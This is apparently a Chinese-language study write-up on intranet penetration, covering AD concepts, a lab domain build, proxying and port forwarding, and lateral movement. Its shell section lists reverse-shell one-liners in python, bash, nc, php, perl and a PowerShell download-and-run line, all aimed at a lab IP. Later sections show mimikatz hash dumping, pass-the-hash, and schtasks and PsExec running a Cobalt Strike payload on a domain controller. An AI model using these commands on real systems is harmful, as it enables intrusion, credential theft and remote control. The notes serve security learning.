内网渗透&横向移动&····

GitHub:https://github.com/Ghostasky/IntranetPenetrationLearn

给个star吧QAQ

[toc]

1.名词解释

工作组、域、域控制器(DC)、父域、子域、域树、域森林、活动目录(AD)、DMZ、域内权限等

工作组

将不同的计算机按功能列入到不同的工作组中。工作组没有集中管理的作用,工作组中所有的计算机都是对等的。工作组不受密码保护。一个账户只能登陆到一台计算机。每一台计算机都在本地存储用户的帐户。

工作组的正规解释:在一个大的单位内,可能有成百上千台电脑互连组成局域网,如果这些电脑不分组,可想而知有多么混乱,要找一台电脑很困难。为了解决这一问题,就有了“工作组”这个概念,将不同的电脑一般按功能(或部门)分别列入不同的工作组中。

每台计算机都是对等的,a机器不能登录b机器。

域,域树,域林,根域

内网基础知识

域(Domain)是一个有安全边界的计算机集合(安全边界意思是在两个域中,一个域中的用户无法访问另一个域中的资源),可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个更加严格的安全管理控制机制,如果你想访问域内的资源,必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。

域控制器(Domain Controller,简写为DC)是一个域中的一台类似管理服务器的计算机,相当于一个单位的门卫一样,它负责每一台联入的电脑和用户的验证工作,域内电脑如果想互相访问首先都是经过它的审核。

单域

在一般的具有固定地理位置的小公司里,建立一个域就可以满足所需。 一般在一个域内要建立至少两个域服务器,一个作为DC,一个是备份DC。如果没有第二个备份DC,那么一旦DC瘫痪了,则域内的其他用户就不能登陆该域了,因为活动目录的数据库(包括用户的帐号信息)是存储在DC中的。而有一台备份域控制器(BDC),则至少该域还能正常使用,期间把瘫痪的DC恢复了就行了。

父域和子域

出于管理及其他一些需求,需要在网络中划分多个域,第一个域称为父域,各分部的域称为该域的子域。

比如一个大公司,它的不同分公司在不同的地理位置,则需父域及子域这样的结构。如果把不同地理位置的分公司放在同一个域内,那么他们之间信息交互(包括同步,复制等)所花费的时间会比较长,而且占用的带宽也比较大。(因为在同一个域内,信息交互的条目是很多的,而且不压缩;而在域和域之间,信息交互的条目相对较少,而且压缩。)

还有一个好处,就是子公司可以通过自己的域来管理自己的资源。

还有一种情况,就是出于安全策略的考虑,因为每个域都有自己独有的安全策略。比如一个公司的财务部门希望能使用特定的安全策略(包括帐号密码策略等),那么可以将财务部门做成一个子域来单独管理。

域树

在一个域树中,父域可以包含很多子域,子域是相对父域来说的,指域名中的每一个段。子域只能使用父域作为域名的后缀,也就是说在一个域树中,域的名字是连续的。

img

域森林

img

DNS域名服务器

DNS域名服务器(Domain Name Server)是进行域名(domain name)和与之相对应的IP地址 (IP address)转换的服务器。

在域树的介绍中,可以看到域树中的域的名字和DNS域的名字非常相似,实际上域的名字就是DNS域的名字,因为域中的计算机使用DNS来定位域控制器和服务器以及其他计算机、网络服务等。

一般情况下,我们在内网渗透时就通过寻找DNS服务器来定位域控制器,因为通常DNS服务器和域控制器会处在同一台机器上。

活动目录(AD)

域环境中提供目录服务的组件。

就是存储有关网络对象(如用户、组、计算机、共享资源、打印机和联系人等)的信息。目录服务是帮助用户快速准确的从目录中查找到他所需要的信息的服务。

AD与DC的区别

把存放有活动目录数据库的计算机就称为DC。所以说我们要实现域环境,其实就是要安装AD,当内网中的一台计算机安装了AD后,它就变成了DC。

安全域划分

安全域划分的目的是将一组安全等级相同的计算机划入同一个网段内,这一网段内的计算机拥有相同的网络边界,在网络边界上采用防火墙部署来实现对其他安全域的NACL(网络访问控制策略),允许哪些IP访问此域、不允许哪些访问此域;允许此域访问哪些IP/网段、不允许访问哪些IP/网段。使得其风险最小化,当发生攻击时可以将威胁最大化的隔离,减少对域内计算机的影响。

img

1.内网(安全级别最高):分为核心区(存储企业最重要的数据,只有很少的主机能够访问)和办公区(员工日常工作区,一般能够访问DMZ,部分主机可以访问核心区)

2.DMZ(Demilitarized Zone,边界网络,隔离区,安全级别中等):作为内网中安全系统和非安全系统之间的缓冲区,用于对外提供服务,一般可以放置一些必须公开的服务器设施

3.外网(Internet,安全级别最低)

DMZ区域

DMZ称为“隔离区”,也称“非军事化区”。是为了解决安装防火墙后外部网络不能访问内部网络服务器的问题,而设立的一个非安全系统与安全系统之间的缓冲区。 这个缓冲区位于企业内部网络和外部网络之间的小网络区域内,在这个小网络区域内可以放置一些必须公开的服务器设施,如企业Web服务器、FTP服务器和论坛等。 另一方面,通过这样一个DMZ区域,更加有效地保护了内部网络,因为这种网络部署,比起一般的防火墙方案,对攻击者来说又多了一道关卡。

  • 内网可以访问外网:内网的用户需要自由地访问外网。在这一策略中,防火墙需要执行NAT。
  • 内网可以访问DMZ:此策略使内网用户可以使用或者管理DMZ中的服务器。
  • 外网不能访问内网:这是防火墙的基本策略了,内网中存放的是公司内部数据,显然这些数据是不允许外网的用户进行访问的。如果要访问,就要通过VPN方式来进行。
  • 外网可以访问DMZ:DMZ中的服务器需要为外界提供服务,所以外网必须可以访问DMZ。同时,外网访问DMZ需要由防火墙完成对外地址到服务器实际地址的转换。
  • DMZ不能访问内网:如不执行此策略,则当入侵者攻陷DMZ时,内部网络将不会受保护。 
  • DMZ不能访问外网:此条策略也有例外,比如我们的例子中,在DMZ中放置邮件服务器时,就需要访问外网,否则将不能正常工作。

域内权限

组(Group)是用户帐号的集合。通过向一组用户分配权限从而不必向每个用户分配权限,管理员在日常工作中不必要去为单个用户帐号设置自己独特的访问权限,而是将用户帐号加入到相对应的安全组中。

1.域本地组

可以从域林中添加用户账号,权限只限于本域资源的访问。

2.全局组

可以从本域中添加用户账号,权限可以访问整个域林的资源。

3.通用组

可从整个域林添加成员,权限可访问整个域林的资源。

4.A-G-DL-P策略

A-G-DL-P策略 (A:表示用户账户、G:表示全局组、U:表示通用组、DL:表示域本地组、P:表示资源权限)

2.域搭建

DC: win2008 ,密码Admin123 DM: win2003 DM: winxp

DC2008:

网络配置

image-20220316174256681

添加服务器角色:

image-20220316174530574

配置域服务(在administrator用户下。。):

dos下:dcpromo

image-20220316174748182

提示错误的话,管理员cmdnet user administrator /passwordreq:yes

设置林根域:

林就是在多域情况下形成的森林,根表示基础,其他在此根部衍生

image-20220316182106728

域数据存放的地址:

image-20220316182303660

密码还是设置为Admin123!

接下来就是配置win2003和xp,都和08差不多

配置的dns要设置为主域控的ip:192.168.188.100

image-20220316183849046

image-20220316184043460

3.端口转发&边界代理

先说下正向代理和反向代理:img

正向代理:Lhost-->proxy-->Rhost

反向代理:Lhost<--->proxy<--->firewall<--->Rhost,一般情况下,防火墙肯定不能让外网机器随便访问地访问内网机器,所以就提出反向代理。

Lhost只向proxy发送普通的请求,具体让他转到哪里,proxy自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透。

代理的本质:socks协议,位于会话层(应用层)

Socks介于传输层与表示层之间,使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务。

目前有两个版本:SOCKS4和SOCKS5

SOCKS4支持TELNET、FTPHTTP等TCP协议;

SOCKS5支持TCP与UDP,并支持安全认证方案。

Ps: Socks不支持ICMP,不能使用ping命令

使用nc演示

主机A:192.168.153.138

主机B:192.168.153.140

正向:

A机:nc -l -p 5555 -t -e cmd.exe,-t是通过telnet模式执行 cmd.exe 程序,可以省略

B机:nc -nvv 192.168.153.138 5555

反向:

B机:监听 nc-lp 5555

在A机反弹:nc -t -e cmd 192.168.153.140 5555

reGeorg+Proxychains

主要是把内网服务器的端口通过http/https隧道转发到本机。

上传reGeorg的tunnel.jsp到web主机A

主机B:python reGeorgSocksProxy.py -p 1080 -u http://192.168.153.137/tunnel.jsp

使用设置proxychains的代理端口,进行访问,一般配合nmap和metasploit进行后续内网渗透。

Ps:socks4版本协议不支持udp和icmp协议,所以使用nmap要加上-sT -Pn即使用tcp协议且不使用icmp协议。

Earthworm+Proxychains

反弹socks5服务器

当目标网络边界不存在公网IP,通过反弹方式创建socks代理。

先在一台具有公网 ip 的主机A上运行以下命令

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

意思是在我们公网VPS上添加一个转接隧道,把1080端口收到的代理请求转交给8888端口

在目标主机B上启动SOCKS5服务 并反弹到公网主机的8888端口

ew_for_Win.exe -s rssocks -d 192.168.153.129(VPS) -e 8888

本地主机(192.168.153.129)然后通过添加公网192.168.153.129:1080这个代理,来访问内网机器(192.168.153.129)

二级网络环境(有公网IP)

假设我们获得了右侧A主机和B主机的控制权限,A主机配有2块网卡,一块10.129.72.168连通外网,一块192.168.153.140只能连接内网B主机,无法访问内网其它资源。B主机可以访问内网资源,但无法访问外网。

img

先上传ew到B主机,利用ssocksd方式启动8888端口的SOCKS代理,命令如下ew_for_Win.exe -s ssocksd -l 8888

A主机执行:ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.153.138 -g 8888(将1080端口收到的代理请求转交给B主机(192.168.153.138)的8888端口)

MyPc就可以通过A的外网代理10.129.72.168:1080访问B。

二级网络(无公网IP)

假设我们获得了右侧A主机和B主机的控制权限,A主机(NAT)没有公网IP,也无法访问内网资源。B主机可以访问内网资源,但无法访问外网。

img

  1. 在公网vps(45.xxx.xxx.72)添加转接隧道,将10800端口收到的代理请求转交给8888端口./ew_for_linux64 -s lcx_listen -l 10800 -e 8888

  2. B主机(192.168.153.138)主机正向开启9999端口

    ./ew_for_Win.exe -s ssocksd -l 9999

  3. A主机利用lcx_slave方式,将公网VPS的888端口和B主机的999端口连接起来

    ./ew_for_Win.exe -s lcx_slave -d 45.xxx.xxx.72 -e 8888 -f 192.168.153.138 -g 9999

现在MyPC可通过访问45.xxx.xxx.72:10800来使用192.168.153.138主机提供的socks5代理,代理成功,vps会有rssocks cmd_socket OK!提示

SSH隧道代理转发

sh有三个强大的端口转发命令,分别是本地转发、远程转发、动态转发。

ssh -qTfnN -D port remotehost

参数详解:
-C 允许压缩数据
-q 安静模式
-T不占用 shell
-f 后台运行,并推荐加上 -n 参数
-N不执行远程命令
-g允许远端主机连接本地转发的端口
-n把 stdin 重定向到 /dev/null (防止从 stdin 读取数据)
-L port:host :hostport 正向代理
//将本地机(客户机)的某个端口转发到远端指定机器的指定端口
-R port:host :hostport 反向代理
//将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口
-D port socks5代理
//指定一个本地机器 "动态" 应用程序端口转发

ssh本地转发

本地转发(local forwarding)指的是,SSH 服务器作为中介的跳板机,建立本地计算机与特定目标网站之间的加密连接。本地转发是在本地计算机的 SSH 客户端建立的转发规则。

它会指定一个本地端口(local-port),所有发向那个端口的请求,都会转发到 SSH 跳板机(tunnel-host),然后 SSH 跳板机作为中介,将收到的请求发到目标服务器(target-host)的目标端口(target-port)。

远程管理服务器上的mysql,mysql不能直接root用户远程登陆。这时候就可以通过本地转发,通过ssh将服务器的3306端口转发到本地1234端口实现以root用户远程登陆mysql。

$ ssh -L local-port:target-host:target-port tunnel-host

ssh -CfNg -L 1234:127.0.0.1:3306 root@45.XX.XX.X21

另一例子:

假定host1是本地主机,host2是远程主机。由于种种原因,这两台主机之间无法连通。但是,另外还有一台host3,可以同时连通前面两台主机。因此,很自然的想法就是,通过host3,将host1连上host2。

##在host1上:
ssh -L 2121:host2:21 host3
##这样一来,我们只要连接host1的2121端口,就等于连上了host2的21端口。
ftp localhost:2121

ssh远程转发

内网的服务器,外网不能直接访问,使用远程转发,将内网的服务器端口转发到外网端口。这时候访问外网的端口,就可以直接访问到了内网的端口。

将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口

既然"本地端口转发"是指绑定本地端口的转发,那么"远程端口转发"当然是指绑定远程端口的转发。

host1与host2之间无法连通,必须借助host3转发。但是,特殊情况出现了,host3是一台内网机器,它可以连接外网的host1,但是反过来就不行,外网的host1连不上内网的host3。这时,“本地端口转发"就不能用了,怎么办?

解决办法是,既然host3可以连host1,那么就从host3上建立与host1的SSH连接,然后在host1上使用这条连接就可以了。

##host3上
ssh -R 2121:host2:21 host1
##就是让host1监听它自己的2121端口,然后将所有数据经由host3,转发到host2的21端口。由于对于host3来说,host1是远程主机,所以这种情况就被称为"远程端口绑定"。

##host1上:
ftp localhost:2121

动态端口转发

无论是本地端口转发还是远程端口转发,都是将某固定主机及其端口映射到本地或远程转发端口上,例如将host2:80映射到host1:2222。也就是说,本地或远程转发端口和目标端口所代表的应用层协议是一对一的关系,2222端口必须对应的是http的80端口,使用浏览器向host1:2222端口发起http请求当然没问题,但是使用ssh工具向host1:2222发起连接将会被拒绝,因为host2上http服务只能解析http请求,不能解析ssh连接请求。

ssh支持动态端口转发,由ssh来判断发起请求的工具使用的是什么应用层协议,然后根据判断出的协议结果决定目标端口。 以下图为例进行说明,host1处在办公内网,能和host3互相通信,但它无法直接和互联网和host2通信,而host3则可以和host2以及互联网通信。

img

要让host1访问互联网,又能和host2的22端口即ssh服务通信,显然在host1上仅设置一个本地端口转发是不够的,虽然可以设置多个本地转发端口分别映射不同的端口,但这显然比较笨重和麻烦。使用动态端口转发即可。

##在host1上
ssh -Nfg -D 2222 host3

端口转发

尝试几个常用的

win:lcx

监听1234端口,转发数据到2333端口
本地:lcx.exe -listen 1234 2333

将目标的3389转发到本地的1234端口
远程:lcx.exe -slave ip 1234 127.0.0.1 3389

netsh 只支持tcp协议

添加转发规则
netsh interface portproxy set v4tov4 listenaddress=192.168.206.101 listenport=3333 connectaddress=192.168.206.100 connectport=3389
此工具适用于,有一台双网卡服务器,你可以通过它进行内网通信,比如这个,你连接192.168.206.101:3388端口是连接到100上面的3389

删除转发规则
netsh interface portproxy delete v4tov4 listenport=9090

查看现有规则
netsh interface portproxy show all

xp需要安装ipv6
netsh interface ipv6 install

linux :

portmap

监听1234端口,转发数据到2333端口
本地:./portmap -m 2 -p1 1234 -p2 2333

将目标的3389转发到本地的1234端口
./portmap -m 1 -p1 3389 -h2 ip -p2 1234

iptables

1、编辑配置文件/etc/sysctl.conf的net.ipv4.ip_forward = 1

2、关闭服务
service iptables stop

3、配置规则
需要访问的内网地址:192.168.206.101
内网边界web服务器:192.168.206.129
iptables -t nat -A PREROUTING --dst 192.168.206.129 -p tcp --dport 3389 -j DNAT --to-destination 192.168.206.101:3389

iptables -t nat -A POSTROUTING --dst 192.168.206.101 -p tcp --dport 3389 -j SNAT --to-source 192.168.206.129

4、保存&&重启服务
service iptables save && service iptables start

socket代理

Windows:xsocks,进行代理后,在windows下推荐使用Proxifier进行socket连接,规则自己定义

linux:

进行代理后,推荐使用proxychains进行socket连接

kali下的配置文件: /etc/proxychains.conf 添加一条:socks5 127.0.0.1 8888

然后在命令前加proxychains就进行了代理

proxychains curl 192.168.111111

4.获取shell

常规

常用一句话反弹shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

bash -i >& /dev/tcp/172.16.1.130/4444 0>&1

nc 172.16.1.130 4444 -t -e /bin/bash

php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

perl -e 'use Socket;$i="172.16.1.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh \-i");};'


powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp
\-Reverse -IPAddress 172.16.1.130 -port 4444

ICMP隧道反弹shell

工具GitHub

有时候防火墙可能对tcp进行来处理,然而对imcp并没有做限制的时候,可以使用icmp弹shell。

直接跑run.sh,就OK,在靶机下运行生成的命令。

5.信息收集

基本命令

查看当前网卡和IP信息:

可以看到通过查看网卡信息可以判断出当前机器是否在域内,以及是否是⼀台域机器

image-20220317175559094

查看操作系统信息

systeminfo

image-20220317175921095

通过查看系统的详细信息我们可以判断出当前主机是一台属于域内的机器,因为在工作组环境的机器只会显示WORKGROUP,而域则会显示域地址。

查看当前登陆域及域用户

image-20220317180028774

查看域内时间

net time /domain

运行 net time /domain 该命令后一般会有如下三种情况:

1.存在域但当前用户不是域用户提示说明权限不够
  C:\Users>bypass>net time /domain
  发生系统错误 5
  拒绝访问

2.存在域并且当前用户是域用户
   C:\Users\Administrator>net time /domain
   \\dc.test.com 的当前时间是 2020/10/23 21:18:37

   命令成功完成

3.当前网络环境为工作组不存在域
   C:\Users\Administrator>net time /domain
   找不到域 WORKGROUP 的域控制器

查找域

image-20220317182421455

查找域内所有计算机

net view /domain GHOST

查询域内所有用户组列表(默认13个)

net group /domain

查询所有域成员计算机列表

net group "domain computer" /domain

image-20220317182701533

查找域控制器

nltest /dclist:ghost

image-20220317183428519

查看域控制器的主机名

Nslookup -type=SRV _ldap._tcp

image-20220317183743360

查看域控制器

net group "domain controllers" /doamin

image-20220317183912489

查询域管理员列表

net group "domain admins" /domain

image-20220317184120741

获取所有域用户列表

net group "domain users" /domain

image-20220317184213265

nltest查询信任域

信任域:可以在工作组里查询,查询内网里是否有域环境

C:\Users\yutaowin10>nltest /domain_trusts /all_trusts  /v /server:192.168.188.100
域信任的列表:
    0: GHOST ghost.com (NT 5) (Forest Tree Root) (Primary Domain) (Native)
       Dom Guid: 9212c4c0-c5ea-49ff-9d48-84fa55b8d0a8
       Dom Sid: S-1-5-21-1238213221-2393825874-2881136966
此命令成功完成

返回所有信任192.168.188.100的域

nltest /dsgetdc:ghost /server:192.168.188.100

C:\Users\yutaowin10>nltest /dsgetdc:ghost /server:192.168.188.100
           DC: \\WIN-4JS3YOGGQ2T
      地址: \\192.168.188.100
     Dom Guid: 9212c4c0-c5ea-49ff-9d48-84fa55b8d0a8
     Dom 名称: GHOST
  林名称: ghost.com
 DC 站点名称: Default-First-Site-Name
我们的站点名称: Default-First-Site-Name
        标志: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_FOREST CLOSE_SITE FULL_SECRET
此命令成功完成

端口收集

端口号 端口说明 攻击技巧
21/22/69 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门
22 ssh:远程连接 爆破OpenSSH;28个退格
23 telnet:远程连接 爆破\嗅探
25 smtp:邮件服务 邮件伪造
53 DNS:域名系统 DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙
67/68 dhcp 劫持\欺骗
110 pop3 爆破
139 samba 爆破\未授权访问\远程代码执行
143 imap 爆破
161 snmp 爆破
389 ldap 注入攻击\未授权访问
512/513/514 linux r 直接使用rlogin
873 rsync 未授权访问
1080 socket 爆破:进行内网渗透
1352 lotus 爆破:弱口令\信息泄漏:源代码
1433 mssql 爆破:使用系统用户登录\注入攻击
1521 oracle 爆破:TNS\注入攻击
2049 nfs 配置不当
2181 zookeeper 未授权访问
3306 mysql 爆破\拒绝服务\注入
3389 rdp 爆破\Shift后门
4848 glassfish 爆破:控制台弱口令\认证绕过
5000 sybase/DB2 爆破\注入
5432 postgresql 缓冲区溢出\注入攻击\爆破:弱口令
5632 pcanywhere 拒绝服务\代码执行
5900 vnc 爆破:弱口令\认证绕过
6379 redis 未授权访问\爆破:弱口令
7001 weblogic Java反序列化\控制台弱口令\控制台部署webshell
80/443/8080 web 常见web攻击\控制台爆破\对应服务器版本漏洞
8069 zabbix 远程命令执行
9090 websphere控制台 爆破:控制台弱口令\Java反序列
9200/9300 elasticsearch 远程代码执行
11211 memcacache 未授权访问
27017 mongodb 爆破\未授权访问

6.Windows认证协议

Windows主要使用NTLM和kerberos认证

1.NTLM认证

NTLM认证

NTLM是NT LAN Manager的缩写,NTLM是基于挑战/应答的身份验证协议,是 Windows NT 早期版本中的标准安全协议。

Windows 中是不保存明文密码的,只会保存密码的哈希值。 其中本机用户的密码哈希是放在 本地的 SAM 文件 里面,域内用户的密码哈希是存在域控的 NTDS.dit 文件 里面.

eg:Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

其中AAD3B435B51404EEAAD3B435B51404EE是LM Hash,31D6CFE0D16AE931B73C59D7E0C089C0是NTLM Hash。

NTLM 协议的认证过程有三步:

  • 协商:主要用于确认双方协议版本(NTLMv1、NTLMv2等)
  • 质询:质询/应答 (Challenge/Response)模式,用于消息交换
  • 验证:验证身份合法性,通常由 Server端或 DC完成这个过程

LM hash

计算方法:

1.密码转为大写,转换为16进制字符串,不足14字节将会用0来再后面补全。

2.密码的16进制字符串被分成两个7byte部分。每部分转换成比特流,并且长度位56bit,长度不足使用0在左边补齐长度

3.再分7bit为一组,每组末尾加0,再组成一组

4.上步骤得到的二组,分别作为key 为 “KGS!@#$%“进行DES加密。

5.将加密后的两组拼接在一起,得到最终LM HASH值。

NTLM hash

从Windows Vista 和 Windows Server 2008开始,默认情况下只存储 NTLM Hash,LM Hash 将不再存在。。

如果空密码或者不储蓄 LM Hash 的话,我们抓到的LM Hash是AAD3B435B51404EEAAD3B435B51404EE。所以在 Windows 7 中我们看到抓到 LM Hash 都是AAD3B435B51404EEAAD3B435B51404EE,这里的 LM Hash 已经没有任何价值了。

NTLM hash计算方法:

  • 1.先将用户密码转换为十六进制格式。
  • 2.将十六进制格式的密码进行Unicode编码。
  • 3.使用MD4摘要算法对Unicode编码数据进行Hash计算

NTLM认证分为本地认证和网络认证。

有三个版本, NTLMv1 、NTLMv2 、NTLMsession v2 三个版本,目前使用最多的是NTLMv2版本。

本地认证

Windows不存储用户的明文密码,它会将用户的明文密码经过加密后存储在 SAM (Security Account Manager Database,安全账号管理数据库)中。

SAM文件的路径是 %SystemRoot%\system32\config\sam

当用户输入密码进行本地认证的过程中,用户输入的密码将为被转化为 NTLM Hash,然后与SAM中的NTLM Hash进行比较。当用户注销、重启、锁屏后,操作系统会让 winlogon.exe 显示登录界面(输入框)。当 winlogon.exe 接收输入后,会将密码交给lsass进程。lsass.exe 是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略,这个进程中会存一份明文密码,将明文密码加密成 NTLM Hash,对SAM数据库比较认证。

winlogon.exe -> 接收用户输入 -> lsass.exe -> (认证)

Net-NTLM Hash v1的格式为:

username::hostname:LM response:NTLM response:challenge

Net-NTLM Hash v2的格式为:

username::domain:challenge:HMAC-MD5:blob

客户端发送用户名等身份信息,服务端生成随机16位challenge发给客户端,客户端使用NTLM hash加密challenge发给服务端。服务端通过用户名找到NTLM hash然后加密challenge跟客户端发送过来的比对,比对成功则认证成功。

网络认证

这种情况适用于使用域账号登录的场景,这个时候服务端是没有用户的hash的。所以不一样的地方是服务端会将用户信息、challenge、客户端返回的信息都发给域控,由域控做认证再返回结果。流程图见下图

1619093645_6081688d6fe4ca32a240d.png!small?1619093647476

2.kerberos认证

Kerberos认证的是由三方来完成的,他们分别是client、server、KDC(Key Distribution Center密钥分发中心)

KDC 服务默认会安装在一个域的域控中,而 Client 和 Server 为域内的用户或者是服务,如 HTTP 服务,SQL 服务。在 Kerberos 中 Client 是否有权限访问 Server 端的服务由 KDC 发放的票据来决定。

其中KDC是由两种服务所构成的:

  • AS(Authentication Service):验证 Client 端的身份,验证通过就会给一张 TGT(Ticket Granting Ticket)票给 Client。

  • TGS(Ticket Granting Service):通过 AS 发送给 Client 的票(TGT)换取访问 Server 端的票ST(ServiceTicket)也有资料称为 TGS Ticket,为了和 TGS 区分,在这里就用 ST 来说明。

AS是用来为client生成TGT(Ticket Granting Ticket)的,TGS是用来为client生成某个服务的ST的,TGT是用来获取ST的临时凭证,ST是用来访问某种服务所必须使用的票据。

KDC 服务框架中包含一个krbtgt账户,它是在创建域时系统自动创建的一个账号,你可以暂时理解为他就是一个无法登陆的账号,在发放票据时会使用到它的密码 HASH 值。

认证流程

1619093657_60816899201be08a4b1ab.png!small?1619093659321

当 Client 想要访问 Server 上的某个服务时,需要先向 AS 证明自己的身份,然后通过 AS 发放的 TGT 向 Server 发起认证请求,这个过程分为三块:

The Authentication Service Exchange:Client 与 AS 的交互;

The Ticket-Granting Service (TGS) Exchange:Client 与 TGS 的交互;

The Client/Server Authentication Exchange:Client 与 Server 的交互。

  1. client与AS:

    client发送: 用户名 + 用户密码加密(用户信息,时间戳等)

    AS:根据用户名找到用户密码,解密出用户信息和事件戳,核实成功后认证成功,然后随机生成一个session key

    AS发送:用户密码加密(session key) + TGT(也就是krbtgt加密(用户信息,session key))

    注意:TGT中用户唯一不知道的是krbtgt的密码hash,所以有了这个hash,就可以自己伪造TGT,也就是所谓的金票据

  2. client与TGS交互

    client发送:session key加密(用户信息,时间戳等) + 需要访问的服务名 + TGT

    TGS:使用krbtgt密码解密TGT,获得session key 解密出用户信息,与TGS中的用户信息比对。认证成功后生成随机的 server session key

    TGS发送:session key加密(server session key) + ST(也就是对应服务端密码加密(用户信息,server session key))

    注意:ST中用户唯一不知道的是server的密码hash,所以有了这个hash,就可以自己伪造ST,也就是所谓的银票据

  3. client与server交互

    client发送:server session key加密(用户信息,时间戳等) + ST

    server:使用自己的密码解密ST,获得server session key,然后将server session key解密后获得的用户信息和ST中的用户信息比对,认证成功。

3.PAC(特权属性证书)

在 Kerberos 最初设计的几个流程里说明了如何证明 Client 是 Client 而不是由其他人来冒充的,但并没有声明 Client 有没有访问 Server 服务的权限,因为在域中不同权限的用户能够访问的资源是有区别的。 所以微软为了解决这个问题在实现 Kerberos 时加入了 PAC 的概念,PAC 的全称是 Privilege Attribute Certificate(特权属性证书)。可以理解为火车有一等座,也有二等座,而 PAC 就是为了区别不同权限的一种方式。

7.横向移动总结

Windows远程连接命令

IPC连接

条件:

1.开放了139、445端口;
2.目标开启ipc$文件共享;
3.获取用户账号密码;

ipc+计划任务恒横向移动:

(1)首先建立向目标主机的IPC$连接

(2)命令执行的脚本传到目标主机

(3)创建计划任务在目标机器上执行命令脚本

(4)删除IPC$连接

连接

image-20220319141047308

映射

net use z: \\192.168.188.100\c$ Admin123! /user:Administrator(把目标C盘映射到本地z盘)

image-20220319141844900

访问/删除路径

net use z: \\192.168.188.100\c$   #直接访问
net use c: /del                 删除映射的c盘,其他盘类推 
net use * /del                 删除全部,会有提示要求按y确认

删除IPC连接

net use \\192.168.188.100\ipc$ /del

at命令

at 命令是Windows自带的用于创建计划任务的命令,但是at 命令只在2003及以下的版本使用。我们可以通过at命令通过跳板机在目标主机DC上创建计划任务,让计算机在指定的时间执行木马程序,从而获得对内网目标主机的控制。

at计划命令在实战中主要有两个用处:一是在获取webshell后不能够执行系统命令的情况下可以用at命令将命令执行后写入txt再用type读取,二是利用at计划任务命令上线cs或者msf

因为at只在2003以下,这里使用win2003()的机子。

at \\192.168.188.100 14:27:00 cmd.exe /c "ipconig > c:\result.txt"

之后使用type读取

image-20220319143430449

一定要注意主机的时间,使用net time \\192.168.188.100查看

删除计划任务

at \\192.168.188.100 1 /delete

schtash命令

2008及以上都没at了,使用schtash代替。

可以直接将cs的exe copy到目标机:

copy C:\xxxx\artifact.exe \\192.168.188.100\c$

之后使用schtash创建计划任务:

schtasks /create /TN cs /s 192.168.188.100 /u "Administrator" /p "Admin123!" /TR C:\artifact.exe /SC once /ST 17:32

/TN 指定任务的名称
/s 指定远程计算机的名称或 IP 地址
/TR 指定任务运行的程序或命令
/SC 指定计划类型。 
/ST 使用24小时时间格式 HH: mm 指定任务的开始时间。


查看帮助
schtasks /create /?

执行计划任务
schtasks /run /tn cs /s 192.168.188.100 /u "Administrator" /p "Admin123!"

查看运行状态
schtasks /query /s 192.168.188.100 /u "Administrator" /p "Admin123!" | findstr "cs"

删除
schtasks /delete /F /tn todayfive /s 192.168.188.100 /u "Administrator" /p "Admin123!"
/f 禁止显示确认消息。 删除任务但不发出警告

使用PsExec

微软自家的,不会被杀

tool_download

需要远程系统开启admin共享(默认是开启的),原理是基于IPC共享,目标需要开放445端口和admin

PsExec64.exe -accepteula \\192.168.188.100 -u WIN-4JS3YOGGQ2T\administrator -p Admin123! -s cmd.exe

-accepteula:第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框
-s:以system权限运行运程进程,获得一个system权限的交互式shell。如果不使用该参数,会获得一个连接所用用户权限的shell

也可以net连上之后psexec:

net use \\192.168.188.100\ipc$ Admin123! /user:administrator 

PsExec.exe -accepteula \\192.168.188.100 cmd.exe
or
PsExec.exe -accepteula \\192.168.188.100 ipconfig

注意要关UAC或者加注册表:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem
添加新DWORD值,键值:LocalAccountTokenFilterPolicy 为1。

但我一直是拒绝访问,,,,不知道为啥。。。。。

PTH(Hash传递攻击,pass the hash)

Kerberos相关攻击技巧

Hash传递攻击

内网渗透之命令行渗透 - 渗透红队笔记

简介

PTH攻击是指攻击者可以通过捕获密码的hash值(无需解密),简单地将其传递来进行身份验证,以此来横向访问其他网络系统。

攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。

工具:

Github

mimikatz

使用mimikatz

使用mimikatz抓取密码或者hash,其实如果在域内主机可以获取到明文密码,我们可以使用明文密码进行登录,但是在很多情况下,由于域内密码复杂度要求,我们可能无法获取到域内主机明文密码,这就导致我们必须使用hash传递来获取域控权限。

需要本地管理员权限

privilege::debug  # 查看是否有debug权限
token::elevate    # 提升到最高权限
sekurlsa::logonpasswords full  #抓取所有的密码,如果密码复杂则只会抓到hash

image-20220318183012610

查看域控文件目录:

mimikatz # sekurlsa::pth /user:administrator /domain:ghost /ntlm:520126a03f5d5a8d836f1c4f34ede7ce
user    : administrator
domain  : ghost
program : cmd.exe
impers. : no
NTLM    : 520126a03f5d5a8d836f1c4f34ede7ce
  |  PID  6968
  |  TID  4008
  |  LSA Process is now R/W
